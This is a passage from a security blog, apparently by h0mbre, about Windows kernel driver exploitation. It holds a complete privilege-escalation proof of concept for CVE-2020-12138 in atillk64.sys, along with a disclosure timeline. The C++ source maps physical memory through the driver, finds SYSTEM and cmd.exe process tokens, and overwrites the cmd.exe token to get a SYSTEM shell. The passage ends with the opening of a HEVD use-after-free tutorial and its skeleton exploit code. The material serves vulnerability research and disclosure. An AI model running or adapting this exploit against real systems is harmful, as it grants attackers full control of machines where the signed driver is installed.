ffffd48ca53b83e0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca21c60b0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48cb36e6410 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca09533b0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca08c8310 : tag Proc, size     0xb70, Nonpaged pool
ffffd48c9bfd40c0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48c9e59d310 : tag Proc, size     0xb70, Nonpaged pool
ffffd48c9fce0310 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca150f400 : tag Proc, size     0xb70, Nonpaged pool
ffffd48cae7de390 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca0ddc330 : tag Proc, size     0xb70, Nonpaged pool

Just plugging in the first address there in the WinDBG Preview memory pane, we can see that from this address, if we subtract 0x10 and then add 0x4, we see our “Proc” tag.

kd> da ffffd48ca040f340-0x10+0x4
ffffd48c`a040f334  "[email protected]"

So we’ve identified a “Proc” pool allocation and we have a good idea of how they are allocated. As b33f explains, they are all 0x10 aligned, so every address here ends in a 0. We know that at some arbitrary address ending in 0, if we look at <address> + 0x4 that is where a “Proc” tag might be.

So the first strategy we’ll employ in parsing for data we’re interested in, is to start at our mapped address and iterate by 0x10 each time and checking the value of our address + 0x4 for “Proc”.

From here, we can appeal to the EPROCESS structure to find the hardcoded offsets to EPROCESS members we’re interested in, which are going to be:

ImageFileName (the name of the process),
UniqueProcessId, and
Token.

I did all my testing on Windows 10 build 18362 and these were the offsets:

kd> !process 0 0 lsass.exe
PROCESS ffffd48ca64e7180
    SessionId: 0  Cid: 0260    Peb: 63d241d000  ParentCid: 01f0
    DirBase: 1c299b002  ObjectTable: ffffe60f220f2580  HandleCount: 1155.
    Image: lsass.exe

kd> dt nt!_EPROCESS ffffd48ca64e7180 UniqueProcessId Token ImageFilename
   +0x2e8 UniqueProcessId : 0x00000000`00000260 Void
   +0x360 Token           : _EX_FAST_REF
   +0x450 ImageFileName   : [15]  "lsass.exe"

So we can see that from the address that would normally be given to us if we did a !poolfind search for “Proc”, it is

0x2e8 to the UniqueProcessId,
0x360 to the Token, and
0x450 to the ImageFileName.

So in our minds right now, our allocations look like this (thanks to ReWolf for breaking this down so well):

POOL_HEADER structure (this is where our tag will reside),
OBJECT_HEADER_xxx_INFO structures,
OBJECT_HEADER which, contains a Body where the EPROCESS structure lives.

The problem I found was that process to process, the size of these structures in between our “Proc” address and the point where our EPROCESS structure begins was wildly varied. Sometimes they were 0x20 in size, sometimes up to 0x90 during my testing. So right now my understanding of these allocations looks something like this:

if <0x10-aligned address> + 0x4 == "Proc"

then <0x10-aligned address> + <some intermediate structure size(somewhere between 0x20 and 0x90 typically)> == <beginning of EPROCESS>

then <beginning of EPROCESS> + 0x2e8 == UniqueProcessId
then <beginning of EPROCESS> + 0x360 == Token
then <beginning of EPROCESS> + 0x450 == ImageFileName

So my code had to account for these varying, let’s just call them “headers” informally for now, sizes. I noticed that all of these “header” structures ended with a 4-byte marker value of 0x00B80003. So what my code would now do is,

find “Proc” by looking at 0x10-aligned addresses and looking at the 4-byte value at +0x4,
once found, iterate 0x10 at a time up to offset 0xA0 (since the largest header size I found was 0x90) looking for 0x00B80003,
take the location of “Proc” and add it to a vector,
take the offset to 0x00B80003 and add it to a vector since we need to know this “header” size to calculate our way to the EPROCESS members we’re interested in.

So now that we have both the location of a “Proc” and the size of the header, we can accurately get UniqueProcessId, Token, and ImageFileName values.

(“Proc” - 0x4) + header-size + 0x2e8 = UniqueProcessId,
(“Proc” - 0x4) + header-size + 0x360 = Token,
(“Proc” - 0x4) + header-size + 0x450 = UniqueProcessId.

As an example, take this “Proc” tag found by !poolfind:

FFFFD48C`B102D320  00 00 B8 02 50 72 6F 63 39 B0 0D A6 8C D4 FF FF  ....Proc9.......
FFFFD48C`B102D330  00 10 00 00 88 0A 00 00 48 00 00 00 FF E8 2E F6  ........H.......
FFFFD48C`B102D340  C0 D4 66 2F 05 F8 FF FF 24 F6 FF FF E8 1F F6 FF  ..f/....$.......
FFFFD48C`B102D350  4A 7F 03 00 00 00 00 00 07 00 00 00 00 00 00 00  J...............
FFFFD48C`B102D360  00 00 00 00 00 00 00 00 93 00 08 00 F6 FF FF E8  ................
FFFFD48C`B102D370  C0 D4 66 2F 05 F8 FF FF 6B 85 EE 27 0F E6 FF FF  ..f/....k..'....
FFFFD48C`B102D380  03 00 B8 00 00 00 00 00 A0 04 0D A2 8C D4 FF FF  ................

We can see that 0xFFFFD48CB102D320 - 0x4 is “Proc”. Our header marker 0x00B80003, denoting when the header ends, is at offset 0x60 from there. We can test that we can find the ImageFileName given this information as follows:

kd> da 0xFFFFD48CB102D320 + 0x60 + 0x450
ffffd48c`b102d7d0  "svchost.exe"

So this looks promising.

Implementing Strategy in Code

One difficulty I faced on my Windows 10 build was that mapping large chunks at a time with DeviceIoControl calling our driver routine would often result in crashes. I didn’t have this problem at all on Windows 7. In my Windows 7 exploit I was able to map a 0x4CCCCCCC byte chunk and parse through the entire thing looking for the values I was after.

On Windows 10, I found the most stable approach to be to map 0x1000 (small page-sized) chunks at a time and then parse through these mapped chunks for my values. If I didn’t find my values, I would map another 0x1000. This too wasn’t crash free. I found that if I made too many mappings I would also crash so I had to find a sweet spot.

I also found that some calls to the driver routine with DeviceIoControl would return a failure. I wasn’t able to completely figure this out but my suspicion is that since our CacheType is hardcoded for us with MmMapIoSpace, if we tried to map pages that had been given a different CacheType in a previous mapping to a virtual address, it would fail. (Does this make sense?)

Picking a physical address to start mapping from is kind of arbitrary but I found the sweet spot on my Windows 10 VM to be around 0x200000000. This VM has about 8 GB of RAM. To limit the amount of mappings, I set a hard cap at 0x240000000 so that my exploit would stop mapping once it hit this address. I also toyed around with adding a limit to the amount of times DeviceIoControl is called but the exploit seems stable enough in testing that this wasn’t necessary in the end.

I used two main functions, the first function maps memory iteratively looking to identify the physical addresses of of “Proc” tags that have our “header marker” value soon after. This function stores the address of each physical location, the size of the header offset, and the size of the offset from the beginning of the memory page to the “Proc” location. It stores all of these values in vectors which are the sole members of a struct which the function returns. The offset to the beginning of the page is simply calculated with a modulus operation and then the remainder is subtracted from the “Proc” location. I wanted to make sure I was always mapping from a nice 0x1000 aligned address. Here is some of that snipped code:

cout << "[>] Going fishing for 100 \"Proc\" chunks in RAM...\n\n";
    while (proc_count < 100)
    {
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = START_ADDRESS + (0x1000 * iteration);

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        if (input_buff.start_address > MAX_ADDRESS)
        {
            cout << "[!] Max address reached!\n";
            cout << "[!] Iterations: " << dec << iteration << "\n";
            exit(1);
        }
        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // The virtual address in our process space where RAM was mapped
            // is located in the first 8 bytes of our output_buff.
            INT64 mapped_address = *(PINT64)output_buff;

            // We will read a 32 bit value at offset i + 0x100 at some point
            // when looking for 0x00B80003, so we can't iterate any further
            // than offset 0xF00 here or we'll get an access violation.
            for (INT64 i = 0; i < (0xF10); i = i + 0x10)
            {
                INT64 test_address = mapped_address + i;
                INT32 test_value = *(PINT32)(test_address + 0x4);
                if (test_value == 0x636f7250)   // "Proc"
                {
                    for (INT64 x = 0; x < (0x100); x = x + 0x10)
                    {
                        INT64 header_address = test_address + x;
                        INT32 header_value = *(PINT32)header_address;
                        if (header_value == 0x00B80003) //  "Header" ending
                        {
                            // We found a "header", this is a legit "Proc"
                            proc_count++;

                            // This is the literal physical mem addr for the
                            // "Proc" pool tag
                            INT64 temp_addr = input_buff.start_address + i;
                            
                            // This address might not be page-aligned to 0x1000
                            // so find out how far off from a multiple of 
                            // 0x1000 we are. This value is stored in our 
                            // PROC_DATA struct in the page_entry_offset
                            // member.
                            INT64 modulus = temp_addr % 0x1000;
                            proc_data.page_entry_offset.push_back(modulus);
                            
                            // This is the page-aligned address where, either
                            // small or large paged memory will hold our "Proc"
                            // chunk. We store this as our proc_address member
                            // in PROC_DATA.
                            INT64 page_address = temp_addr - modulus;
                            proc_data.proc_address.push_back(
                                page_address);
                            proc_data.header_size.push_back(x);
                        }
                    }
                }
            }
            iteration++;
        }
        else
        {
            // DeviceIoControl failed
            iteration++;
            failures++;
        }
    }
    cout << "[>] \"Proc\" chunks found\n";
    cout << "    - Failed DeviceIoControl calls: " << dec << failures << "\n";
    cout << "    - Total DeviceIoControl calls: " << dec << iteration << "\n\n";

    // Returns struct of two vectors, one holds Proc chunk address
    // one holds header-size for that Proc chunk.
    return proc_data;

The next function takes the returned proc_data struct and re-maps 0x1000 bytes of physical memory starting at the physical memory address of the “Proc” tag (-0x4) but from the beginning of that page. The largest header length I found being 0x90, and the largest offset of interest being 0x450, we definitely don’t need to map this much from this address but I found that mapping anything less would sporadically lead to crashes as it wouldn’t be perfectly page-aligned.

The function knows the “Proc” tag location, the header size, and the offsets for valuable EPROCESS members and goes looking for any likely to be SYSTEM process as defined in a global vector.

vector<INT64> SYSTEM_procs = {
    0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    0x6578652e73736d73,         // smss.exe
    0x7365636976726573,         // services.exe
    0x6b6f72426d726753,         // SgrmBroker.exe
    0x2e76736c6f6f7073,         // spoolsv.exe
    0x6e6f676f6c6e6977,         // winlogon.exe
    0x2e74696e696e6977,         // wininit.exe
    0x6578652e736d6c77,         // wlms.exe
};

If it finds one of these processes and our cmd.exe process it will overwrite the cmd.exe Token with the Token value of a privileged process giving us an nt authority\system shell.

INT64 SYSTEM_token = 0;
    INT64 cmd_token_addr = 0;
    bool SYSTEM_found = false;

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    for (int i = 0; i < proc_data.proc_address.size(); i++)
    {
        // We need to map 0x1000 bytes from our "Proc" tag so that we can parse
        // out all the EPROCESS members we're interested in. The deepest member
        // is ImageFileName at offset 0x450 from the end of the header. Header
        // sizes varied from 0x20 to 0x90 in my testing. start_address will be
        // the address of the beginning of each 0x1000 aligned address closest
        // to the "Proc" tag we found.
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = proc_data.proc_address[i];

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        DWORD bytes_returned = 0;

        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // Pointer to the beginning of our process space with the mapped
            // 0x1000 bytes of physmem
            INT64 mapped_address = *(PINT64)output_buff;

            // mapped_address is mapping from our page entry where, on that
            // page, exists a "Proc" tag. Therefore, we need both the header
            // size and the offset from the page entry to the "Proc" tag so
            // we can calculate the static offsets/values of the EPROCESS
            // memebers ImageFileName, Token, UniqueProcessId...
            INT64 imagename_address = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x450; //ImageFileName
            INT64 imagename_value = *(PINT64)imagename_address;

            INT64 proc_token_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i] 
                + 0x360; //Token
            INT64 proc_token = *(PINT64)proc_token_addr;

            INT64 pid_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i] 
                + 0x2e8; //UniqueProcessId
            INT64 pid_value = *(PINT64)pid_addr;

            // See if the ImageFileName 64 bit hex value is in our vector of
            // common SYSTEM processes
            int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
                imagename_value);
            if (sys_result != 0 and SYSTEM_found == false)
            {
                SYSTEM_token = proc_token;
                cout << "[>] SYSTEM process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
                SYSTEM_found = true;
            }
            else if (imagename_value == 0x6568737265776f70 or
                imagename_value == 0x6578652e646d63)  // powershell or cmd
            {
                cmd_token_addr = proc_token_addr;
                cout << "[>] cmd.exe process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
            }
        }
        else
        {
            //DeviceIoControl failed
        }
    }
    if ((!cmd_token_addr) or (!SYSTEM_token))
    {
        cout << "[!] Token swapping requirements not met.\n";
        cout << "[!] Last physical address scanned: " << hex <<
            proc_data.proc_address.back() << ".\n";
        cout << "[!] Better luck next time!\n";
        exit(1);
    }
    else
    {
        *(PINT64)cmd_token_addr = SYSTEM_token;
        cout << "[>] SYSTEM and cmd.exe token info found, swapping tokens...\n";
        exit(0);
    }
}

As you can see, if we don’t find both a SYSTEM process and our cmd.exe process, the program exits without doing anything. This wasn’t often the case whenever the test machine was left running for at least 2-3 minutes after booting.

Searching for 100 process allocations in the pool is somewhat aggressive. The program will exit if it doesn’t find this many before bumping into the hard cap. Keep in mind that it doesn’t start parsing for the EPROCESS data until it has collected 100 “Proc” tag locations. This could mean that the program exits having already identified the relevant process chunks needed to elevate privileges.

This number can be toned down and the exploit could be trivially tweaked to search very small sections of physical memory at a time before exiting, annotating along the way and printing any valuable EPROCESS structure information to the terminal as it progresses. It could for instance be tweaked to search n amount of physical memory, output the location and token values of any privileged process or the cmd.exe process, and then exit while specifying the last memory address that it mapped. You could then start the exploit up again but this time specify the new last memory address mapped and map n from there and repeat until you had everything you needed.

The hardest part was finding the cmd.exe process. Likely-to-be-SYSTEM processes were easy to find. If you have a remote-desktop/GUI equivalent access to the host machine, you could open a few cmd.exe processes and greatly improve your odds of finding one to overwrite and elevate privileges.

Even with just one cmd.exe process, I was able to find and overwrite my token roughly 90% of the time. With more than one, it was 100% in my testing.

There are some improvements that can be made to the exploit no doubt, but as is, it works really well in my testing and can be tweaked fairly easily. I believe it sufficiently proves the vulnerability.

Mandatory screenshot:

Huge Thanks

Huge thanks to @FuzzySecurity for all of the tutorials, I’ve recently also finished up his HEVD exploit tutorials and have learned a ton from his blog. Just an awesome resource.

Thanks to @HackSysTeam for the HackSysExtremeVulnerable driver, it has been such a great learning resource and got me started down this path.

Thanks to both @ihack4falafel and @ilove2pwn_ for answering all of my questions along the way or helping me find the answers myself. Very grateful.

Thanks to @TheColonial for his advice about disclosure and his awesome CAPCOM.SYS YouTube video series. I learned a lot of nice WinDBG tricks from this.

Thanks again to @jessemichael for being so helpful and charitable.

Thanks to Jackson T. for not only his blog post but for answering all my questions and being extremely helpful, really appreciate it.

And finally thanks to all those cited blog authors @rwfpl and @hatRiot.

All testing performed on Build 18362.19h1_release.190318-1202.

Please, let me know if you find any errors.

Disclosure Timeline

February 25th 2020 – Email, Customer Service Ticket, and Twitter DM sent to GIGABYTE USA
February 26th 2020 – Email to AMD [email protected] notification of vulnerability found and PoC created
February 26th 2020 – Response from psirt to send PoC
February 26th 2020 – PoC sent to psirt
March 7th 2020 – Ask for update from psirt, no update given
March 16th 2020 – Ask for update from psirt
March 16th 2020 – psirt responds that the issue has been previously reported and that they don’t support the product as a result
March 16th 2020 – I inform psirt that other parties are still packaging and installing the driver and there is no advisory for the driver
March 24th 2020 – psirt states that support for the driver ended in late 2019 and to contact GIGABYTE directly
April 14th 2020 – No response from GIGABYTE USA, request CVE
April 24th 2020 – Assigned CVE-2020-12138, blog posted

Exploit Code

// CVE-2020-12138
// EOP Exploit POC for atillk64.sys by @h0mbre_
// C:\Program Files (x86)\GIGABYTE\RGBFusion\AtiTool\atillk64.sys
// Driver vulnerability referenced in: 
// https://github.com/eclypsium/Screwed-Drivers
// https://eclypsium.com/2019/08/10/screwed-drivers-signed-sealed-delivered/

#include <iostream>
#include <vector>
#include <algorithm>
#include <Windows.h>
#include "h0mbre.h"
using namespace std;

#define DEVICE_NAME         "\\\\.\\atillk64"
#define IOCTL               0x9C402564
#define START_ADDRESS       (INT64)0x200000000   // based off testing my VM
#define MAX_ADDRESS         (INT64)0x240000000   // based off testing my VM

// Creating vector of hex representation of ImageFileNames of common 
// SYSTEM processes, eg. 'wmlms.exe' = hex('exe.smlw')
vector<INT64> SYSTEM_procs = {
    0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    0x6578652e73736d73,         // smss.exe
    0x7365636976726573,         // services.exe
    0x6b6f72426d726753,         // SgrmBroker.exe
    0x2e76736c6f6f7073,         // spoolsv.exe
    0x6e6f676f6c6e6977,         // winlogon.exe
    0x2e74696e696e6977,         // wininit.exe
    0x6578652e736d6c77,         // wlms.exe
};

// Creating struct for our input buffer to DeviceIoControl
typedef struct {
    INT64 start_address;
    DWORDLONG num_of_bytes;
    DWORDLONG padding;
} INPUT_BUFFER;

// This struct will hold the address of a "Proc" tag and that Proc chunk's 
// header size
struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};

// Grabs handle to atillk64.sys
HANDLE get_handle(const char* device_name) {
    HANDLE hFile = CreateFileA(
        device_name,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        cout << "[!] Unable to grab handle to atillk64.sys.\n";
        exit(1);
    }
    else
    {
        string hex_output = pretty_hex((int)hFile);
        cout << "[>] Successfully grabbed handle to atillk64.sys: "
            << hex_output << "\n";

        return hFile;
    }
}

// Mapping memory from a physical address to our process virtual space
PROC_DATA map_memory(HANDLE device_handle) {

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    string hex_output = pretty_hex((int)output_buff);
    cout << "[>] Output buffer allocated at: " << hex_output << ".\n";

    DWORD bytes_returned = 0;

    PROC_DATA proc_data;

    // failures == unsucessful DeviceIoControl calls
    int failures = 0;

    // How many legitamate "Proc" chunks we've found in memory as in
    // we've confirmed they have headers.
    int proc_count = 0;
    int iteration = 0;
    cout << "[>] Going fishing for 100 \"Proc\" chunks in RAM...\n\n";
    while (proc_count < 100)
    {
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = START_ADDRESS + (0x1000 * iteration);

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        if (input_buff.start_address > MAX_ADDRESS)
        {
            cout << "[!] Max address reached!\n";
            cout << "[!] Iterations: " << dec << iteration << "\n";
            exit(1);
        }
        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // The virtual address in our process space where RAM was mapped
            // is located in the first 8 bytes of our output_buff.
            INT64 mapped_address = *(PINT64)output_buff;

            // We will read a 32 bit value at offset i + 0x100 at some point
            // when looking for 0x00B80003, so we can't iterate any further
            // than offset 0xF00 here or we'll get an access violation.
            for (INT64 i = 0; i < (0xF10); i = i + 0x10)
            {
                INT64 test_address = mapped_address + i;
                INT32 test_value = *(PINT32)(test_address + 0x4);
                if (test_value == 0x636f7250)   // "Proc"
                {
                    for (INT64 x = 0; x < (0x100); x = x + 0x10)
                    {
                        INT64 header_address = test_address + x;
                        INT32 header_value = *(PINT32)header_address;
                        if (header_value == 0x00B80003) //  "Header" ending
                        {
                            // We found a "header", this is a legit "Proc"
                            proc_count++;

                            // This is the literal physical mem addr for the
                            // "Proc" pool tag
                            INT64 temp_addr = input_buff.start_address + i;

                            // This address might not be page-aligned to 0x1000
                            // so find out how far off from a multiple of 
                            // 0x1000 we are. This value is stored in our 
                            // PROC_DATA struct in the page_entry_offset
                            // member.
                            INT64 modulus = temp_addr % 0x1000;
                            proc_data.page_entry_offset.push_back(modulus);

                            // This is the page-aligned address where, either
                            // small or large paged memory will hold our "Proc"
                            // chunk. We store this as our proc_address member
                            // in PROC_DATA.
                            INT64 page_address = temp_addr - modulus;
                            proc_data.proc_address.push_back(
                                page_address);
                            proc_data.header_size.push_back(x);
                        }
                    }
                }
            }
            iteration++;
        }
        else
        {
            // DeviceIoControl failed
            iteration++;
            failures++;
        }
    }
    cout << "[>] \"Proc\" chunks found\n";
    cout << "    - Failed DeviceIoControl calls: " << dec << failures << "\n";
    cout << "    - Total DeviceIoControl calls: " << dec << iteration << "\n\n";

    // Returns struct of two vectors, one holds Proc chunk address
    // one holds header-size for that Proc chunk.
    return proc_data;
}

void parse_procs(HANDLE device_handle, struct PROC_DATA proc_data) {

    INT64 SYSTEM_token = 0;
    INT64 cmd_token_addr = 0;
    bool SYSTEM_found = false;

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    for (int i = 0; i < proc_data.proc_address.size(); i++)
    {
        // We need to map 0x1000 bytes from our "Proc" tag so that we can parse
        // out all the EPROCESS members we're interested in. The deepest member
        // is ImageFileName at offset 0x450 from the end of the header. Header
        // sizes varied from 0x20 to 0x90 in my testing. start_address will be
        // the address of the beginning of each 0x1000 aligned address closest
        // to the "Proc" tag we found.
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = proc_data.proc_address[i];

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        DWORD bytes_returned = 0;

        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // Pointer to the beginning of our process space with the mapped
            // 0x1000 bytes of physmem
            INT64 mapped_address = *(PINT64)output_buff;

            // mapped_address is mapping from our page entry where, on that
            // page, exists a "Proc" tag. Therefore, we need both the header
            // size and the offset from the page entry to the "Proc" tag so
            // we can calculate the static offsets/values of the EPROCESS
            // memebers ImageFileName, Token, UniqueProcessId...
            INT64 imagename_address = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x450; //ImageFileName
            INT64 imagename_value = *(PINT64)imagename_address;

            INT64 proc_token_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x360; //Token
            INT64 proc_token = *(PINT64)proc_token_addr;

            INT64 pid_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x2e8; //UniqueProcessId
            INT64 pid_value = *(PINT64)pid_addr;

            // See if the ImageFileName 64 bit hex value is in our vector of
            // common SYSTEM processes
            int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
                imagename_value);
            if (sys_result != 0 and SYSTEM_found == false)
            {
                SYSTEM_token = proc_token;
                cout << "[>] SYSTEM process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
                SYSTEM_found = true;
            }
            else if (imagename_value == 0x6568737265776f70 or
                imagename_value == 0x6578652e646d63)  // powershell or cmd
            {
                cmd_token_addr = proc_token_addr;
                cout << "[>] cmd.exe process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
            }
        }
        else
        {
            //DeviceIoControl failed
        }
    }
    if ((!cmd_token_addr) or (!SYSTEM_token))
    {
        cout << "[!] Token swapping requirements not met.\n";
        cout << "[!] Last physical address scanned: " << hex <<
            proc_data.proc_address.back() << ".\n";
        cout << "[!] Better luck next time!\n";
        exit(1);
    }
    else
    {
        *(PINT64)cmd_token_addr = SYSTEM_token;
        cout << "[>] SYSTEM and cmd.exe token info found, swapping tokens...\n";
        exit(0);
    }
}

void ascii() {

    cout << "\n\n\t     CVE-2020-12138 Proof-of-Concept\n";
    cout << "\t   EOP in ATI Technologies atillk64.sys\n\n";
    cout << "\t\t\t       by @h0mbre_\n\n\n";
}

int main() {

    ascii();

    // Grab handle to our device driver atillk64.sys
    HANDLE hFile = get_handle(DEVICE_NAME);

    // Return a pointer to our output buffer
    PROC_DATA proc_data = map_memory(hFile);

    // Look through our PROC_DATA struct for the values we need, ie EPROCESS
    // members for the processes we're interested in
    parse_procs(hFile, proc_data);
}

HEVD Exploits – Windows 7 x86 Use-After-Free

The Human Machine Interface

h0mbre

23 April 2020 at 04:00

Introduction

Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver. I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from any strategies I saw employed in the blogposts out of necessity or me trying to do my own thing to learn more.

This series will be light on tangential information such as:

how drivers work, the different types, communication between userland, the kernel, and drivers, etc
how to install HEVD,
how to set up a lab environment
shellcode analysis

The reason for this is simple, the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high-level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

To @r0oki7 for their walkthrough,
To @FuzzySec for their walkthrough,

UAF Setup

I’ve never exploited a use-after-free bug on any system before. I vaguely understood the concept before starting this excercise. We need what, in my noob opinion, seems like quite a lot of primitives in order to make this work. Obviously HEVD goes out of its way to be vulnerable in precisely the correct way for us to get an exploit working which is perfect for me since I have no experience with this bug class and we’re just here to learn. I feel like although we have to utilize multiple functions via IOCTL, this is actually a more simple exploit to pull off than the pool overflow that we just did.

Also, I wanted to do this on 64 bit; however, most of the strategies I saw outlined required that we use NtQuerySystemInformation, which as far as I know requires your process to be elevated to an extent so I wanted to avoid that. On 64 bit, the pool header structure size changes from 0x8 bytes to 0x10 bytes which makes exploitation more cumbersome; however, there are some good walkthroughs out there about how to accomplish this. For now, let’s stick to x86.

What do we need in order to exploit a use-after-free bug? Well, it seems like after doing this excercise we need to be able to do the following:

allocate an object in the non-paged pool,
a mechansim that creates a reference to the object as a global variable, ie if our object is allocated at 0xFFFFFFFF, there is some variable out there in the program that is storing that address for later use,
the ability to free the memory and not have the previously established reference NULLed out, ie when the chunk is freed the program author doesn’t specify that the reference=NULL,
the ability to create “fake” objects that have the same size and controllable contents in the non-paged pool,
the ability to spray the non-paged pool and create perfectly sized holes so that our UAF and fake objects can be fitted in our created holes,
finally, the ability to use the no-longer valid reference to our freed chunk.

Allocating the UAF Object in the Pool

Let’s take a look at the UAF object allocation routine in the driver in IDA.

It may not be immediately clear what’s going on without stepping through the routine in the debugger but we actually have very little control over what is taking place here. I’ve created a small skeleton exploit code and set a breakpoint towards the start of the routine. Here is our code at the moment:

#include <iostream>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void create_UAF_object(HANDLE hFile) {

    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        ALLOCATE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);
}


int main() {

    HANDLE hFile = grab_handle();

    create_UAF_object(hFile);

    return 0;
}

You can see from the IDA screenshot that after the call to ExAllocatePoolWithTag, eax is placed in esi, this is about where I’ve placed the breakpoint, we can then take the value in esi which should be a pointer to our allocation, and go see what the allocation will look like after the subsequent memset operation completes. We can see some static values as well, such as waht appears to be the size of the allocation (0x58), which we know from our last post is actually undersold by 0x8 since we have to account also for the pool header, so our real allocation size in the pool is 0x60 bytes.

So we hit our breakpoint after ExAllocatePoolWithTag and then I just stepped through until the memset completed.

Right after the memset completed, we look up our object in the pool and see that it’s mostly been filled with A characters except for the first DWORD value has been left NULL. After stepping through the next two instructions:

We can see that the DWORD value has been filled and also that a null terminator has been added to the last byte of our allocation. This DWORD is the UaFObjectCallback which is a function pointer for a callback which gets used during a separate routine.

And lastly in the screenshot we can see that move esi, which is the location of our allocation, into the global variable g_UseAfterFreeObject. This is important because this is what makes this code vulnerable as this same variable will not be nulled out when the object is freed.

Freeing the UAF Object

Now, lets try interacting with the driver routine which allows us to free our object.

Not a whole lot here, we can see though that there is no effort made to NULL the global variable g_UserAfterFreeObject. You can see that even after we run the routine, the vairable still holds the value of our freed allocation address:

Allocating a Fake Object

